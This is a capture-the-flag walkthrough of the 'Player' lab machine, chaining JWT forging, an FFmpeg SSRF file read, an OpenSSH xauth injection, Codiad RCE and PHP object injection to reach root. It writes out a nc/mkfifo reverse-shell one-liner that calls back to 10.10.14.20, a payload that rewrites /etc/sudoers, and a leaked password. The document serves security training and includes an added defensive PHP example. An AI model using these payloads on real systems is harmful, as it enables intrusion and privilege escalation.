In this article you will learn the following:
- Scanning targets using nmap.
- Identifying a PHP backup file.
- Playing with JWT (JSON Web Token).
- Exploiting FFmpeg software.
- Scanning for vhosts.
- Exploiting the OpenSSH 7.2p1 xauth command injection.
- Identifying and exploiting the Codiad web-based IDE.
- Escaping a limited shell.
- Monitoring processes via pspy64.
- Exploiting POI (PHP Object Injection).
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.11
80/tcp open http Apache httpd 2.4.7
6686/tcp open ssh OpenSSH 7.2 (protocol 2.0)
First, I checked HTTP port 80 and got a forbidden page, so I ran gobuster to brute-force directories.
I found /launcher with a 301 code, which opens an application named playBuf.
I checked the application's features with Burp Suite.
I found that the Send button makes a GET request to another page that carries a JWT and then redirects us to index.html, so I decoded the JWT with https://jwt.io.
After a lot of enumeration I found a backup of this page, http://10.10.10.145/launcher/dee8dc8a47256c64630d803a4c40786c.php~, which contains the code that generates and decodes the JWT.
I started analysing the PHP code: it replaces the '_' in the key with '/' and then base64-decodes it.
Now that I know what the code does: there is a check whether the access_code inside the access cookie matches '0E76658526655756207688271159624026011393', and if it does, it redirects us to a new directory. So we write a simple PHP script that changes the access_code and re-signs the token with the right key.
After running the code I got the new JWT.
I changed the token and sent it to dee8dc8a47256c64630d803a4c40786c.php, which redirected me to a new directory, 7F2dcsSdZo6nj3SNMTQ1/, with a new application.
After some enumeration I found it uses FFmpeg (an open-source project for processing audio and video formats). There is an SSRF exploit for this software; this is a good report from HackerOne: https://hackerone.com/reports/115978
After fetching the script that generates the .avi file for the LFI (https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS), I uploaded the .avi file to the system.
By clicking on "Buffed Media" and downloading the .avi file, here is the magic: I got passwd from the server.
I installed a script to brute-force vhosts, filtered on status code and content length, and found two vhosts:
* ruby scan.rb --ip=10.10.10.145 --host=player.htb
* dev.player.htb, staging.player.htb
After checking all pages and trying all features, I found an error message in contact.php.
It revealed two files on the server, which I read using the FFmpeg SSRF exploit:
* python gen_avi.py file:///var/www/backup/service_config config.avi
I got creds from /var/www/backup/service_config
I tried these credentials over SSH and got lshell (a limited shell).
I searched for an OpenSSH 7.2 exploit and found one.
After running the script I got shell access as user.
I read the fix.php file that I had not read yet, and got new credentials: peter:CQXpm\z)G5D#%S$y=
After a lot of enumeration and trying these creds over SSH without success, I found that the creds are valid on http://dev.player.htb/, which opens a new system for us.
After some searching and digging into the source code I found what this is:
I found the word "codiad", searched for it on Google, and found a Codiad RCE.
I tried it with Peter's creds, it worked, and I got a shell.
After getting a reverse shell I tried to switch user to telegen, but it drops into lshell. So I searched for how to bypass this and found there is an option:
* su telegen -s /bin/bash
After an hour I decided to get pspy64 to watch the processes, and I found a cron job run by root in an interesting path:
* python -m SimpleHTTPServer 80
* wget http://10.10.14.20/pspy64
I checked the /var/lib/playbuff directory to see what is in it.
After that I saw buff.php, which uses serialization. A good link for this type of attack:
There are two ways to get root:
- PHP object injection.
- I can switch to www-data and change the database connection file to a reverse shell: /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php
** Method 1: via POI (PHP Object Injection)
I edited /etc/sudoers to make user telegen run anything:
– telegen ALL=(ALL)ALL
etc/sudoers";s:7:"logData";s:20:"telegen ALL=(ALL)ALL";}' > merge.log
– wait 1 min
– sudo -l
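As an added defensive example (not code from the original write-up or from the box), here is how the root cron job's merge-log loader could refuse to instantiate classes from a file an unprivileged user controls; the LogEntry class, its property names and the sample blob are constructed for illustration.

```php
<?php
// Added example, not from the original write-up. Class name, property names
// and the sample blob are constructed for illustration.

// Stand-in for the gadget class the cron job's code makes available: a class
// whose properties name a file path and the data to append to it.
final class LogEntry {
    public string $logFile = '';
    public string $logData = '';
}

// Vulnerable pattern: every class named in the blob is instantiated, so magic
// methods (__wakeup/__destruct) run with the cron job's privileges.
function loadMergeLogUnsafe(string $path) {
    return unserialize(file_get_contents($path));
}

// Hardened pattern: never instantiate classes from untrusted input, and only
// accept a plain array of strings.
function loadMergeLogSafe(string $path): array {
    $data = @unserialize(file_get_contents($path), ['allowed_classes' => false]);
    if (!is_array($data)) {
        throw new RuntimeException('merge log is not a plain array');
    }
    foreach ($data as $entry) {
        if (!is_string($entry)) {
            // Objects surface as __PHP_Incomplete_Class here; reject them outright.
            throw new RuntimeException('non-string entry in merge log');
        }
    }
    return $data;
}

// Constructed sample: an object whose properties point at a privileged path.
$sample = 'O:8:"LogEntry":2:{s:7:"logFile";s:12:"/etc/sudoers";s:7:"logData";s:4:"test";}';
$tmp = tempnam(sys_get_temp_dir(), 'mergelog');
file_put_contents($tmp, $sample);

// With allowed_classes => false no LogEntry instance exists, so no magic method can run.
$obj = unserialize($sample, ['allowed_classes' => false]);
var_dump($obj instanceof __PHP_Incomplete_Class);

try {
    loadMergeLogSafe($tmp);
} catch (RuntimeException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
unlink($tmp);
```

Replacing the serialized log format with JSON (json_decode with assoc=true) removes the object-instantiation surface entirely and is the better fix where the format can be changed.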
** Method 2: via editing the database file
echo '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|
nc 10.10.14.20 9909 >/tmp/f");?>' > /var/www/html/launcher/
– nc -lvp 9909
– wait 1 min